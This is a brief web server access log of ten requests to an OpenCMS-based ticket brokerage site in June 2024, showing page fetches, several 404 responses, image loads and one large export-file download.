66.249.72.33 - - [29/Jun/2024:02:49:45 +0200] "GET /ticket2/opencms/en/venue/?venueid=7323AE7D-D178-B332-F0E5-FE2EC0804060 HTTP/1.1" 200 71365
192.99.14.159 - - [29/Jun/2024:02:49:46 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=05D22DC2-C8CC-911A-5392-29A47CDB52B7&sortorder=asc&column=price HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:49:50 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=060C0EE9-3660-B6E5-7141-2D93961E8D86&sortorder=asc&column=row HTTP/1.1" 404 -
185.157.223.150 - - [29/Jun/2024:02:49:53 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 24556651
192.99.14.159 - - [29/Jun/2024:02:49:55 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=060C0EE9-3660-B6E5-7141-2D93961E8D86&sortorder=asc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:50:03 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=06541B01-9413-917E-91B4-20FD84AFFCAC&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.38.73 - - [29/Jun/2024:02:50:08 +0200] "GET /ticket2/opencms/no/buy/?catid=43171577-14C8-6B19-25D9-DF372BFFCBFA&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=6 HTTP/1.1" 200 77856
47.128.38.73 - - [29/Jun/2024:02:50:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
192.99.14.159 - - [29/Jun/2024:02:50:09 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=06541B01-9413-917E-91B4-20FD84AFFCAC&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.38.73 - - [29/Jun/2024:02:50:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
